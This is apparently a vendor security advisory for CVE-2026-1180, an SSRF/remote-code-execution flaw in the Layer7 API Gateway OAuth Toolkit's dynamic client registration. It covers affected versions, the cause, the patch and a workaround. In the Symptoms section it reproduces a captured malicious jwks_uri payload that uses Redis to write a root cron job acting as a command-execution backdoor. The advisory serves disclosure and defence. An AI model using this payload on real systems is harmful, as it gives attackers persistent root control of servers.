CVE-2026-1180 Affecting CA-API Gateway 11.x and OTK 4.6.x versions
search cancel

CVE-2026-1180 Affecting CA-API Gateway 11.x and OTK 4.6.x versions

book

Article ID: 438852

calendar_today

Updated On:

Products

CA API Gateway

Issue/Introduction

Introduction 

Layer7 API Gateway environments utilizing the OAuth Toolkit (OTK) may be vulnerable to a security flaw in the OpenID Connect Dynamic Client Registration feature. This vulnerability allows an attacker to provide an unvalidated jwks_uri parameter, potentially leading to Server-Side Request Forgery (SSRF) or Remote Code Execution (RCE).

Symptoms Active exploitation attempts may show unauthorized requests to OIDC endpoints. Real-time debug logs may capture malicious payloads in the jwks_uri field, such as encoded Redis commands: "jwks_uri": "http://####:7379/EVAL/redis.call('CONFIG','SET','dir','/etc/cron.d')..."

the following content was captured directly from real-time debug of the affected service and is provided unchanged for analysis.

{
  "client_name": "my_client_name",
  "grant_types": ["client_credentials"],
  "response_types": ["token"],
  "redirect_uris": ["https://example.com/cb"],
  "token_endpoint_auth_method": "private_key_jwt",
  "token_endpoint_auth_signing_alg": "ES256",
  "jwks_uri": "http://<IP_Address>:7379/EVAL/redis.call('CONFIG','SET','dir','/etc/cron.d'); redis.call('CONFIG','SET','dbfilename','wshell4'); redis.call('SET','c',[==[
PATH=/usr/bin:/usr/local/bin:/bin:/usr/sbin:/sbin
* * * * * root RCL=$(which redis-cli 2>/dev/null); [ -z \"$RCL\" ] && RCL=/usr/bin/redis-cli; CMD=$($RCL -h 127.0.0.1 -p 6379 GETDEL wsh_in 2>/dev/null); [ -n \"$CMD\" ] && OUT=$(bash -c \"$CMD\" 2>&1 | tr -d '\\000-\\010\\013-\\031' | head -c 2000) && $RCL -h 127.0.0.1 -p 6379 SET wsh_out \"$OUT\"
]==]); redis.call('BGSAVE'); return 'ok'/0"
}
 

Affected endpoints include:

  • /openid/connect/register
  • /.well-known/openid-configuration
  • /openid/connect/jwks.json

 

 

 

 

 

Environment

  • Layer7 API Gateway: 11.0, 11.1
  • OAuth Toolkit (OTK): 4.6.0 - 4.7.0

Cause

The vulnerability is caused by insufficient destination validation for the jwks_uri parameter during Dynamic Client Registration.

Resolution

Fixed in release OTK 4.7.1 and higher. Use Download Solution Patches  to download this release.

For users on earlier versions, apply the version-specific patch:

Workaround: If Dynamic Client Registration is not required, disable the following service endpoints on the Gateway:

  1. /openid/connect/register
  2. /openid/connect/register/*

 

Additional Information

  • Internal Defect: DE669709
  • To speak with a customer representative or a Support Engineer see Contact Support. Scroll to the bottom of the page and click on your respective region.
Powered by Wolken Software